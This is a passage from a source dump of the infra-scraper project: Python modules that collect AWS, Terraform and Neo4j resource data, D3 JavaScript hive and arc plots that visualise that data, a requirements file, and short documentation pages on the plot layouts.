var links = plotFunctions.createLinks(nodes, data.relations);\n\n console.log(nodes);\n\n var angle = function(d) {\n var angle = 0,\n found = false;\n axes.forEach(function(item) {\n if (d.kind == item.kind) {\n angle = item.angle;\n found = true;\n }\n });\n if (!found) {\n console.log(\"Cannot compute angle for \" + d.kind + \" \" + d.name)\n }\n return angle;\n }\n\n var svg = container\n .append(\"svg\")\n .attr(\"width\", targetWidth)\n .attr(\"preserveAspectRatio\",\"xMidYMid meet\")\n .attr(\"height\", targetHeight)\n .append(\"g\")\n .attr(\"transform\", \"translate(\" + (targetWidth / 2) + \",\" + (targetHeight / 2) + \")\");\n\n var mouseFunctions = {\n linkOver: function(d) {\n svg.selectAll(\".link\").classed(\"active\", function(p) {\n return p === d;\n });\n svg.selectAll(\".node circle\").classed(\"active\", function(p) {\n return p === d.source || p === d.target;\n });\n svg.selectAll(\".node text\").classed(\"active\", function(p) {\n return p === d.source || p === d.target;\n });\n },\n nodeOver: function(d) {\n var $elem = d3.select(this);\n svg.selectAll(\".link\").classed(\"active\", function(p) {\n return p.source === d || p.target === d;\n });\n svg.selectAll(\".link.active\").each(function(link){\n svg.selectAll(\".node.node-\"+getNodeCode(link.target)+\", .node.node-\"+getNodeCode(link.source))\n .classed(\"active\",true);\n });\n $elem.classed(\"active\") || $elem.classed(\"active\",true);\n tooltip.html(\"Node - \" + d.name + \"<br/>\" + \"Kind - \" + d.kind)\n .style(\"left\", (d3.event.pageX + 5) + \"px\")\n .style(\"top\", (d3.event.pageY - 28) + \"px\");\n tooltip.transition()\n .duration(200)\n .style(\"opacity\", .9);\n },\n out: function(d) {\n svg.selectAll(\".active\").classed(\"active\", false);\n tooltip.transition()\n .duration(500)\n .style(\"opacity\", 0);\n }\n };\n\n var tooltip = d3.select(\"#HiveChartTooltip\");\n // tooltip is d3 selection\n if(tooltip.empty()){\n tooltip = d3.select(\"body\").append(\"div\")\n 
.attr(\"id\", \"HiveChartTooltip\")\n .attr(\"class\", \"tooltip\")\n .style(\"opacity\", 0);\n }\n\n // Plot render\n var axe = svg.selectAll(\".node\").data(axes)\n .enter().append(\"g\");\n\n axe.append(\"line\")\n .attr(\"class\", \"axis\")\n .attr(\"transform\", function(d) {\n return \"rotate(\" + d.angle + \")\";\n })\n .attr(\"x1\", function(d) {\n return radiusMapping[d.kind].range()[0]\n })\n .attr(\"x2\", function(d) {\n return radiusMapping[d.kind].range()[1]\n });\n\n axe.append(\"text\")\n .attr(\"class\", \"axis-label\")\n .attr('font-size', '16px')\n .attr('font-family', 'Open Sans')\n .attr('text-anchor', 'middle')\n .attr('alignment-baseline', 'central')\n .text(function(d) {\n return d.name;\n })\n .attr(\"transform\", function(d) {\n var x = (radiusMapping[d.kind].range()[1] + 30) * Math.cos(Math.radians(d.angle));\n var y = (radiusMapping[d.kind].range()[1] + 30) * Math.sin(Math.radians(d.angle));\n return \"translate(\" + x + \", \" + y + \")\";\n });\n\n svg.selectAll(\".link\").data(links)\n .enter().append(\"path\")\n .attr(\"class\", \"link\")\n .attr(\"d\", d3.hive.link()\n .angle(function(d) {\n return Math.radians(angle(d));\n })\n .radius(function(d) {\n return radiusMapping[d.kind](d.y * itemStep[d.kind] - 0.1);\n }))\n .on(\"mouseover\", mouseFunctions.linkOver)\n .on(\"mouseout\", mouseFunctions.out);\n\n var node = svg.selectAll(\".node\").data(nodes)\n .enter().append(\"g\")\n .attr(\"class\",function(d){\n return \"node node-\"+getNodeCode(d);\n })\n .attr(\"transform\", function(d) {\n var x = radiusMapping[d.kind](d.y * itemStep[d.kind] - 0.1) * Math.cos(Math.radians(angle(d)));\n var y = radiusMapping[d.kind](d.y * itemStep[d.kind] - 0.1) * Math.sin(Math.radians(angle(d)));\n return \"translate(\" + x + \", \" + y + \")\";\n });\n\n node.append(\"circle\")\n .attr(\"r\", 16)\n\n node.append(\"text\")\n .attr('fill', function(d) { return iconFunctions.color(d.kind); })\n .attr('font-size', function(d) { return iconFunctions.size(d.kind); })\n .attr('font-family', function(d) { return iconFunctions.family(d.kind); })\n .text(function(d) { return iconFunctions.character(d.kind); })\n .attr(\"transform\", function(d) { return iconFunctions.transform(d.kind); });\n\n node.on(\"mouseover\", mouseFunctions.nodeOver)\n .on(\"mouseout\", mouseFunctions.out);\n\n node.on(\"click\", function(node){\n svg.selectAll(\".node\").classed(\"selected\", function(d) { return d === node; });\n svg.selectAll(\".link\").classed(\"selected\", function(p) {\n return p.source === node || p.target === node;\n });\n if(config.hasOwnProperty(\"nodeClickFn\") && typeof config.nodeClickFn === 'function'){\n config.nodeClickFn(node);\n }\n });\n }\n render();\n window.removeEventListener('resize', render);\n window.addEventListener('resize', render);\n }\n};" }, { "alpha_fraction": 0.6171082854270935, "alphanum_fraction": 0.6178196668624878, "avg_line_length": 36.731544494628906, "blob_id": "0775476ce4202ccc2e435734ecd1267d8657ab89", "content_id": "42d2b6e9bd583be5ea625186a967836137aa3520", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5623, "license_type": "permissive", "max_line_length": 108, "num_lines": 149, "path": "/infra_scraper/storage/neo4j.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nfrom .base import BaseStorage\nimport os\nimport glob\nimport yaml\nimport logging\n\nfrom infra_scraper.utils import to_camel_case, ClassRegistry\n\nfrom neomodel import config, 
StructuredNode, StringProperty, IntegerProperty, JSONProperty\nfrom neomodel.match import OUTGOING, INCOMING, EITHER\nfrom neomodel.relationship_manager import RelationshipManager\nfrom neomodel.relationship import StructuredRel\n\n\nlogger = logging.getLogger(__name__)\n\nregistry = ClassRegistry()\n\n\nclass ResourceRel(StructuredRel):\n size = IntegerProperty(default=1)\n status = StringProperty(default='unknown')\n\n\nclass RelationshipDefinition(object):\n def __init__(self, relation_type, cls_name, direction, manager=RelationshipManager, model=None):\n self._raw_class = cls_name\n self.manager = manager\n self.definition = {}\n self.definition['relation_type'] = relation_type\n self.definition['direction'] = direction\n self.definition['model'] = model\n\n def _lookup_node_class(self):\n if not isinstance(self._raw_class, str):\n self.definition['node_class'] = self._raw_class\n else:\n name = self._raw_class\n self.definition['node_class'] = registry.get_type(name)\n\n def build_manager(self, source, name):\n self._lookup_node_class()\n return self.manager(source, name, self.definition)\n\n\nclass ZeroOrMore(RelationshipManager):\n \"\"\"\n A relationship of zero or more nodes (the default)\n \"\"\"\n description = \"zero or more relationships\"\n\n\ndef _relate(cls_name, direction, rel_type, cardinality=None, model=None):\n\n if model and not issubclass(model, (StructuredRel,)):\n raise ValueError('model must be a StructuredRel')\n return RelationshipDefinition(rel_type, cls_name, direction, cardinality, model)\n\n\ndef RelationshipTo(cls_name, rel_type, cardinality=ZeroOrMore, model=None):\n return _relate(cls_name, OUTGOING, rel_type, cardinality, model)\n\n\ndef RelationshipFrom(cls_name, rel_type, cardinality=ZeroOrMore, model=None):\n return _relate(cls_name, INCOMING, rel_type, cardinality, model)\n\n\ndef Relationship(cls_name, rel_type, cardinality=ZeroOrMore, model=None):\n return _relate(cls_name, EITHER, rel_type, cardinality, model)\n\n\nclass Neo4jStorage(BaseStorage):\n\n def __init__(self, **kwargs):\n super(Neo4jStorage, self).__init__(**kwargs)\n config.DATABASE_URL = kwargs['database_url']\n\n def convert_relations(self, relation_types):\n for relation_name, relation in relation_types.items():\n registry.add(type(\n relation_name,\n (ResourceRel,),\n relation.get('model', {})))\n\n def convert_resources(self, resource_types):\n for resource_name, resource in resource_types.items():\n fields = {\n 'uid': StringProperty(unique_index=True),\n 'name': StringProperty(required=True),\n 'kind': StringProperty(required=True),\n 'metadata': JSONProperty(required=True),\n }\n for field_name, field in resource.get('model', {}).items():\n cls_name = field.pop(\"type\")\n target_cls = field.pop('target')\n model_name = field.pop('model')\n field['model'] = registry.get_type(model_name)\n fields[field_name] = globals().get(to_camel_case(cls_name))(target_cls, model_name, **field)\n registry.add(type(resource_name,\n (StructuredNode,), fields))\n\n def _get_last_timestamp(self, name):\n sinks = glob.glob('{}/*.yaml'.format(self._get_storage_dir(name)))\n last_sink = max(sinks, key=os.path.getctime)\n return last_sink.split('/')[-1].replace('.yaml', '')\n\n def save_data(self, name, data):\n self.convert_relations(data['relation_types'])\n self.convert_resources(data['resource_types'])\n\n resources = {}\n\n for resource_type_name, resource_type in data['resources'].items():\n cls = registry.get_type(resource_type_name)\n for resource_name, resource in resource_type.items():\n # 
import pdb; pdb.set_trace()\n                resources[resource['uid']] = cls(**resource).save()\n        for relation_type_name, relation_type in data['relations'].items():\n            for relation in relation_type:\n                if relation['source'] in resources and relation['target'] in resources:\n                    source = resources[relation['source']]\n                    target = resources[relation['target']]\n                    try:\n                        rel_field = data['relation_types'][relation_type_name]['relation'][source.kind]\n                    except KeyError:\n                        rel_field = data['relation_types'][relation_type_name]['relation']['default']\n                    relation = getattr(source, rel_field).build_manager(source, relation_type_name)\n                    relation.connect(target, {})\n\n        self.last_timestamp = data['timestamp']\n\n    def load_data(self, name):\n        data = None\n        self.last_timestamp = self._get_last_timestamp(name)\n        filename = '{}/{}.yaml'.format(self._get_storage_dir(name),\n                                       self.last_timestamp)\n        with open(filename, 'r') as stream:\n            try:\n                data = yaml.safe_load(stream)\n            except yaml.YAMLError as exception:\n                logger.error(exception)\n        return data\n\n    def save_output_data(self, name, kind, data):\n        pass\n\n    def load_output_data(self, name, kind):\n        pass\n" }, { "alpha_fraction": 0.7050632834434509, "alphanum_fraction": 0.7139240503311157, "avg_line_length": 28.214284896850586, "blob_id": "25d52c9d5e399e33b04b401f59438e58d664d36c", "content_id": "3ea582641afd6a2ccc3e9ae9ca43c53510e38bb0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 794, "license_type": "permissive", "max_line_length": 77, "num_lines": 28, "path": "/doc/source/text/layout-hive.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n=========\nHive Plot\n=========\n\nThe `hive plot` is a visualization method for drawing networks. Nodes\nare mapped to and positioned on radially distributed linear axes — this\nmapping is based on network structural properties. Edges are drawn as curved\nlinks. The result is simple and interpretable.\n\nThe purpose of the hive plot is to establish a new baseline for visualization\nof large networks — a method that is both general and tunable and useful as a\nstarting point in visually exploring network structure.\n\nSample Visualizations\n=====================\n\n.. 
figure:: ../static/img/hive-plot.png\n   :width: 100%\n   :figclass: align-center\n\n   Hive plot of all OpenStack resources (cca 3000 nodes)\n\n\nMore Information\n================\n\n* http://mkweb.bcgsc.ca/linnet/\n* https://bost.ocks.org/mike/hive/" }, { "alpha_fraction": 0.499827116727829, "alphanum_fraction": 0.5081258416175842, "avg_line_length": 41.844444274902344, "blob_id": "1aa83421f26f7eae9a3bb2b88446696bd767900b", "content_id": "a93746dc8165f302d3d38efbafd82b68c87980d3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5784, "license_type": "permissive", "max_line_length": 95, "num_lines": 135, "path": "/infra_scraper/input/amazon.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport boto3\nfrom infra_scraper.input.base import BaseInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.aws')\n\n\nclass AmazonWebServicesInput(BaseInput):\n\n    def __init__(self, **kwargs):\n        self.kind = 'aws'\n        self.scope = kwargs.get('scope', 'local')\n        super(AmazonWebServicesInput, self).__init__(**kwargs)\n        self.ec2_client = boto3.resource('ec2')\n        self.s3_client = boto3.resource('s3')\n\n    def scrape_all_resources(self):\n#        self.scrape_ec2_images()\n#        self.scrape_ec2_elastic_ips()\n        self.scrape_ec2_instances()\n        self.scrape_ec2_internet_gateways()\n        self.scrape_ec2_subnets()\n        self.scrape_ec2_vpcs()\n        self.scrape_ec2_key_pairs()\n        self.scrape_s3_buckets()\n\n    def _create_relations(self):\n        for resource_id, resource in self.resources.get('ec2_instance', {}).items():\n            if 'VpcId' in resource['metadata']:\n                if resource['metadata']['VpcId'] in self.resources.get('ec2_vpc', {}):\n                    self._scrape_relation(\n                        'in_ec2_vpc',\n                        resource_id,\n                        resource['metadata']['VpcId'])\n\n            if 'KeyName' in resource['metadata']:\n                if resource['metadata']['KeyName'] in self.resources.get('ec2_key_pair', {}):\n                    self._scrape_relation(\n                        'using_ec2_key_pair',\n                        resource_id,\n                        resource['metadata']['KeyName'])\n\n            if 'SubnetId' in resource['metadata']:\n                if resource['metadata']['SubnetId'] in self.resources.get('ec2_subnet', {}):\n                    self._scrape_relation(\n                        'in_ec2_subnet',\n                        resource_id,\n                        resource['metadata']['SubnetId'])\n\n    def scrape_ec2_elastic_ips(self):\n        # Elastic IPs live in the ``vpc_addresses`` collection of the boto3\n        # EC2 resource and are identified by their allocation id.\n        for item in self.ec2_client.vpc_addresses.all():\n            resource = item.meta.__dict__\n            resource.pop('resource_model')\n            resource.pop('client')\n            self._scrape_resource(resource['data']['AllocationId'],\n                                  resource['data']['PublicIp'],\n                                  'ec2_elastic_ip', None, metadata=resource['data'])\n\n    def scrape_ec2_images(self):\n        for item in self.ec2_client.images.all():\n            resource = item.meta.__dict__\n            resource.pop('resource_model')\n            resource.pop('client')\n            if 'Name' in resource['data']:\n                image_name = resource['data']['Name']\n            else:\n                image_name = resource['data']['ImageId']\n            self._scrape_resource(resource['data']['ImageId'],\n                                  image_name,\n                                  'ec2_image', None, metadata=resource['data'])\n\n    def scrape_ec2_instances(self):\n        for item in self.ec2_client.instances.all():\n            resource = item.meta.__dict__\n            resource.pop('resource_model')\n            resource.pop('client')\n            try:\n                name = resource['data']['NetworkInterfaces'][0]['Association']['PublicDnsName']\n            except Exception:\n                name = resource['data']['InstanceId']\n            logger.debug(resource['data'])\n            self._scrape_resource(resource['data']['InstanceId'],\n                                  name,\n                                  'ec2_instance', None, metadata=resource['data'])\n\n    def scrape_ec2_internet_gateways(self):\n        for item in 
self.ec2_client.internet_gateways.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n self._scrape_resource(resource['data']['InternetGatewayId'],\n resource['data']['InternetGatewayId'],\n 'ec2_internet_gateway', None, metadata=resource['data'])\n\n def scrape_ec2_key_pairs(self):\n for item in self.ec2_client.key_pairs.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n self._scrape_resource(resource['data']['KeyName'],\n resource['data']['KeyName'],\n 'ec2_key_pair', None, metadata=resource['data'])\n\n def scrape_ec2_subnets(self):\n for item in self.ec2_client.subnets.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n self._scrape_resource(resource['data']['SubnetId'],\n resource['data']['SubnetId'],\n 'ec2_subnet', None, metadata=resource['data'])\n\n def scrape_ec2_vpcs(self):\n for item in self.ec2_client.vpcs.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n name = resource['data']['VpcId']\n for tag in resource['data'].get('Tags', {}):\n if tag['Key'] == 'Name':\n name = tag['Value']\n self._scrape_resource(resource['data']['VpcId'],\n name,\n 'ec2_vpc', None, metadata=resource['data'])\n\n def scrape_s3_buckets(self):\n for item in self.s3_client.buckets.all():\n resource = item.meta.__dict__\n resource.pop('resource_model')\n resource.pop('client')\n self._scrape_resource(resource['data']['Name'],\n resource['data']['Name'],\n 's3_bucket', None, metadata=resource['data'])\n" }, { "alpha_fraction": 0.4569922983646393, "alphanum_fraction": 0.4656792879104614, "avg_line_length": 38.67231750488281, "blob_id": "7a53d0228b0a6c55e064dac314b4ef59bf132a9a", "content_id": "9d148f076fc25a6fac3c827ebc4a8e049eac9ca4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7022, "license_type": "permissive", "max_line_length": 132, "num_lines": 177, "path": "/infra_scraper/assets/static/js/d3.plot.arc.js", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "var RelationalPlot = function(RelationalPlot){\n /**\n * Arc diagram rendering method\n * @param dataUrl - Data endpoint URL\n * @param graphSelector - Graph parent <div> CSS selector\n * @param refreshInterval - Refresh interval in seconds (null for disabled)\n */\n RelationalPlot.arc = function(dataUrl, graphSelector, refreshInterval) {\n\n var nodeCount;\n var nodeRadius = d3.scaleSqrt().range([3, 7]);\n var linkWidth = d3.scaleLinear().range([1.5, 2 * nodeRadius.range()[0]]);\n\n var margin = { top: 0, right: 18, bottom: 18, left: 18 };\n\n var width = $(graphSelector).innerWidth() - margin.left - margin.right;\n var height = $(graphSelector).innerWidth() * 2/3 - margin.top - margin.bottom;\n\n var x = d3.scaleLinear().range([0, width]);\n\n var graph = this;\n\n this._data = {};\n\n this.init = function(alreadyRunning) {\n if(alreadyRunning && graph.svg) {\n graph.svg.remove()\n }\n\n graph.svg = d3.select(graphSelector).append(\"svg\")\n .attr('width', width + margin.left + margin.right)\n .attr('height', height + margin.top + margin.bottom)\n .append('g')\n .attr('transform', 'translate(' + margin.left + ',' + margin.top + ')');\n\n if(!alreadyRunning){\n graph.requestData(dataUrl, graph.render);\n $(window).on('resize', function(ev){\n graph.init(true);\n graph.render();\n });\n\n if(refreshInterval){\n setInterval(function(){\n graph.requestData(dataUrl, 
function(){\n graph.init(true);\n graph.render();\n });\n }, refreshInterval * 1000);\n }\n }\n };\n\n this.createNodes = function(items) {\n var output = [];\n var index = 0;\n for (var key in items) {\n item = items[key];\n item[\"x\"] = index / nodeCount * width;\n item[\"y\"] = height;\n index += 1;\n output.push(item);\n }\n return output;\n };\n\n this.createAxes = function(items) {\n items.map(function(item, index) {\n item.icon.color = d3.schemeCategory20[index];\n iconMapping[item.kind] = item.icon;\n });\n };\n\n this.createLinks = function(nodes, relations) {\n return relations.map(function(link) {\n var retLink = {};\n nodes.forEach(function(node) {\n if (link.source == node.id) {\n retLink.source = node;\n } else if (link.target == node.id) {\n retLink.target = node;\n }\n });\n if (!retLink.hasOwnProperty(\"source\") || !retLink.hasOwnProperty(\"target\")) {\n console.log(\"Can not find relation node for link \" + link);\n retLink = link;\n }\n return retLink;\n });\n }\n\n this.render = function() {\n\n nodeCount = Object.keys(graph._data.resources).length;\n nodes = graph.createNodes(graph._data.resources);\n graph.createAxes(Object.values(graph._data.axes));\n links = graph.createLinks(nodes, graph._data.relations);\n\n nodeRadius.domain(d3.extent(nodes, function (d) { return 18 }));\n linkWidth.domain(d3.extent(links, function (d) { return 1 }));\n\n var link = graph.svg.append('g')\n .attr('class', 'links')\n .selectAll('path')\n .data(links)\n .enter().append('path')\n .attr('d', function (d) {\n return ['M', d.source.x, height, 'A',\n (d.source.x - d.target.x)/2, ',',\n (d.source.x - d.target.x)/2, 0, 0, ',',\n d.source.x < d.target.x ? 1 : 0, d.target.x, ',', height]\n .join(' ');\n })\n .attr('stroke-width', function (d) { return 2; })\n .on('mouseover', function (d) {\n link.style('stroke', null);\n d3.select(this).style('stroke', '#d62333');\n// node.style('fill', function (node_d) {\n// return node_d === d.source || node_d === d.target ? 'black' : null;\n// });\n })\n .on('mouseout', function (d) {\n link.style('stroke', null);\n// node.style('fill', null);\n });\n\n var node = graph.svg.append('g')\n .attr('class', 'nodes')\n .selectAll('circle')\n .data(nodes)\n .enter().append('g')\n .attr(\"transform\", function(d){\n return \"translate(\" + d.x + \", \" + d.y + \")\"\n });\n\n node.append('circle')\n .attr('r', function (d) { return 16; })\n .on('mouseover', function (d) {\n// node.style('fill', null);\n// d3.select(this).style('fill', 'black');\n var nodesToHighlight = links.map(function (e) { return e.source === d ? e.target : e.target === d ? e.source : 0})\n .filter(function (d) { return d; });\n// node.filter(function (d) { return nodesToHighlight.indexOf(d) >= 0; })\n// .style('fill', '#555');\n link.style('stroke', function (link_d) {\n return link_d.source === d | link_d.target === d ? 
'#d62333' : null;\n });\n })\n .on('mouseout', function (d) {\n node.style('fill', null);\n link.style('stroke', null);\n });\n\n node.append(\"text\")\n .attr('fill', function(d) { return iconFunctions.color(d.kind); })\n .attr('font-size', function(d) { return iconFunctions.size(d.kind); })\n .attr('font-family', function(d) { return iconFunctions.family(d.kind); })\n .text(function(d) { return iconFunctions.character(d.kind); })\n .attr(\"transform\", function(d) { return iconFunctions.transform(d.kind); })\n \n };\n\n this.requestData = function(dataUrl, callback){\n d3.json(dataUrl, function(res){\n graph._data = res;\n relationalPlotHelpers.displayResources(Object.keys(graph._data.resources).length);\n relationalPlotHelpers.displayRelations(graph._data.relations.length);\n relationalPlotHelpers.displayScrapeTime(res.date);\n if(typeof callback === 'function'){\n callback();\n }\n });\n };\n\n };\n return RelationalPlot;\n}(RelationalPlot || {});\n" }, { "alpha_fraction": 0.6180555820465088, "alphanum_fraction": 0.6180555820465088, "avg_line_length": 26.380952835083008, "blob_id": "aaf5a3c4ea12acf0c1e59545cc8c64d4d0a6c215", "content_id": "65831bdb60faef4ecec8acfb64d239e6a28b8886", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 576, "license_type": "permissive", "max_line_length": 74, "num_lines": 21, "path": "/infra_scraper/output/raw.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport logging\nfrom .base import BaseOutput\n\nlogger = logging.getLogger(__name__)\n\n\nclass RawOutput(BaseOutput):\n\n def __init__(self, **kwargs):\n super(RawOutput, self).__init__(**kwargs)\n\n def transform_data(self, data):\n resources = {}\n\n for resource_name, resource_data in data['resources'].items():\n resources[resource_name] = []\n for resource_id, resource_item in resource_data.items():\n resources[resource_name].append(resource_item['metadata'])\n\n data['resources'] = resources\n return data\n" }, { "alpha_fraction": 0.8591065406799316, "alphanum_fraction": 0.8625429272651672, "avg_line_length": 13.600000381469727, "blob_id": "f78432bbae5c7fbead4817d0c667a728858f8b95", "content_id": "b95d702e71c0664627871d6a2d85f732087af325", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 291, "license_type": "permissive", "max_line_length": 46, "num_lines": 20, "path": "/requirements.txt", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "pyyaml\nmsgpack-python\nFlask\nClick\nos_client_config\npython-cinderclient\npython-glanceclient\npython-heatclient\npython-keystoneclient\npython-novaclient\npython-neutronclient\npykube\nboto3\ntosca-parser\nsalt-pepper\npython-terraform\npydot\ngraphviz\njuju\ngit+https://github.com/maas/python-libmaas.git" }, { "alpha_fraction": 0.6137565970420837, "alphanum_fraction": 0.6137565970420837, "avg_line_length": 22.375, "blob_id": "28ed523594df76a7499c9da0c58fa59eca12bc4e", "content_id": "fe49f4028f82b3111225f277a768391ff407891a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 189, "license_type": "permissive", "max_line_length": 58, "num_lines": 8, "path": "/doc/source/text/input-terraform.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===================\nTerraForm Templates\n===================\n\nConfiguration for parsing terraform templates.\n\n.. 
literalinclude:: ../static/config/config-terraform.yaml\n :language: yaml\n\n" }, { "alpha_fraction": 0.5490638613700867, "alphanum_fraction": 0.5574103593826294, "avg_line_length": 46.66666793823242, "blob_id": "434419908e433d9f533e9e17a9cb4757ad662dd6", "content_id": "b058c7e56edf422c2d68afe73ce248087e1ab407", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4433, "license_type": "permissive", "max_line_length": 114, "num_lines": 93, "path": "/infra_scraper/input/terraform.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport io\nimport python_terraform\nfrom pydot import graph_from_dot_data\nfrom infra_scraper.input.base import BaseInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.terraform')\n\nrelation_mapping = {\n 'tf_openstack_compute_instance_v2-tf_openstack_compute_keypair_v2': 'using_tf_key_pair',\n 'tf_openstack_networking_subnet_v2-tf_openstack_networking_network_v2': 'in_tf_net',\n 'tf_openstack_compute_floatingip_associate_v2-tf_openstack_networking_floatingip_v2': 'links_tf_floating_ip',\n 'tf_openstack_networking_floatingip_v2-tf_openstack_networking_router_interface_v2': 'links_tf_floating_ip',\n 'tf_openstack_networking_router_interface_v2-tf_openstack_networking_subnet_v2': 'in_tf_subnet',\n 'tf_openstack_networking_router_interface_v2-tf_openstack_networking_router_v2': 'links_tf_router',\n 'tf_openstack_compute_instance_v2-tf_openstack_networking_network_v2': 'in_tf_net',\n 'tf_openstack_compute_floatingip_associate_v2-tf_openstack_compute_instance_v2': 'links_tf_floating_instance',\n 'tf_openstack_compute_instance_v2-tf_openstack_compute_secgroup_v2': 'has_tf_security_group',\n}\n\nclass TerraformInput(BaseInput):\n\n def __init__(self, **kwargs):\n self.kind = 'terraform'\n super(TerraformInput, self).__init__(**kwargs)\n self.client = python_terraform.Terraform(\n working_dir=self.config['dir'])\n\n def scrape_all_resources(self):\n self.scrape_resources()\n\n def clean_name(self, name):\n return name.replace('\"', '').replace('[root] ', '').strip()\n\n def _create_relations(self):\n return_code, raw_data, stderr = self.client.graph(\n no_color=python_terraform.IsFlagged)\n graph = graph_from_dot_data(raw_data)[0]\n for edge in graph.obj_dict['subgraphs']['\"root\"'][0]['edges']:\n source = self.clean_name(edge[0]).split('.')\n target = self.clean_name(edge[1]).split('.')\n if 'tf_{}'.format(source[0]) in self.resources and 'tf_{}'.format(target[0]) in self.resources:\n self._scrape_relation(\n relation_mapping['tf_{}-tf_{}'.format(source[0], target[0])],\n '{}.{}'.format(source[0], source[1]),\n '{}.{}'.format(target[0], target[1]))\n\n def scrape_resources(self):\n return_code, raw_data, stderr = self.client.graph(\n no_color=python_terraform.IsFlagged)\n graph = graph_from_dot_data(raw_data)[0]\n nodes = {}\n for node in graph.obj_dict['subgraphs']['\"root\"'][0]['nodes']:\n clean_node = 'tf_{}'.format(self.clean_name(node).split('.')[0])\n if clean_node in self._schema['resource']:\n nodes[self.clean_name(node)] = {\n 'id': self.clean_name(node),\n 'name': self.clean_name(node).split('.')[1],\n 'kind': 'tf_{}'.format(self.clean_name(node).split('.')[0]),\n 'metadata': {}\n }\n res = None\n return_code, raw_data, stderr = self.client.show(\n no_color=python_terraform.IsFlagged)\n raw_data = raw_data.split('Outputs:')[0]\n data_buffer = io.StringIO(raw_data)\n for line in data_buffer.readlines():\n if 
line.strip() == '':\n pass\n elif line.startswith(' '):\n meta_key, meta_value = line.split(' = ')\n res['metadata'][meta_key.strip()] = meta_value.strip()\n else:\n if res is not None:\n nodes[res['id']]['metadata'] = res['metadata']\n resource_id = line.replace(' (tainted', '') \\\n .replace(':', '').replace('(', '').replace(')', '').strip()\n try:\n resource_kind, resource_name = str(resource_id).split('.')\n res = {\n 'id': resource_id,\n 'name': resource_name.strip(),\n 'kind': 'tf_{}'.format(resource_kind),\n 'metadata': {}\n }\n except Exception as exception:\n logger.error(exception)\n for node_name, node in nodes.items():\n self._scrape_resource(node['id'], node['name'],\n node['kind'], None,\n metadata=node['metadata'])\n" }, { "alpha_fraction": 0.29487180709838867, "alphanum_fraction": 0.29487180709838867, "avg_line_length": 24, "blob_id": "baa21a08340245d105636bdd959096aab0b80fa2", "content_id": "f8a2f521c53beff92a3339a3d28853ee69095ec9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 78, "license_type": "permissive", "max_line_length": 24, "num_lines": 3, "path": "/doc/source/text/app-architecture.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n========================\nApplication Architecture\n========================\n\n\n" }, { "alpha_fraction": 0.7306700944900513, "alphanum_fraction": 0.7532216310501099, "avg_line_length": 37.79999923706055, "blob_id": "0104b36b7bd27911499acb2809fd17e9c1d4aba6", "content_id": "6f2e723e22fa84d78da1dfec6d625ac0b376f148", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1552, "license_type": "permissive", "max_line_length": 78, "num_lines": 40, "path": "/doc/source/text/layout-arc.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===========\nArc Diagram\n===========\n\nAn arc diagram is a style of graph drawing, in which the vertices of a graph\nare placed along a line in the Euclidean plane, with edges being drawn as\nsemicircles in one of the two halfplanes bounded by the line, or as smooth\ncurves formed by sequences of semicircles. In some cases, line segments of the\nline itself are also allowed as edges, as long as they connect only vertices\nthat are consecutive along the line.\n\nThe use of the phrase \"arc diagram\" for this kind of drawings follows the use\nof a similar type of diagram by Wattenberg (2002) to visualize the repetition\npatterns in strings, by using arcs to connect pairs of equal substrings.\nHowever, this style of graph drawing is much older than its name, dating back\nto the work of Saaty (1964) and Nicholson (1968), who used arc diagrams to\nstudy crossing numbers of graphs. An older but less frequently used name for\narc diagrams is `linear embeddings`.\n\nHeer, Bostock & Ogievetsky wrote that arc diagrams \"may not convey the overall\nstructure of the graph as effectively as a two-dimensional layout\", but that\ntheir layout makes it easy to display multivariate data associated with the\nvertices of the graph.\n\n\nSample Visualizations\n=====================\n\n.. 
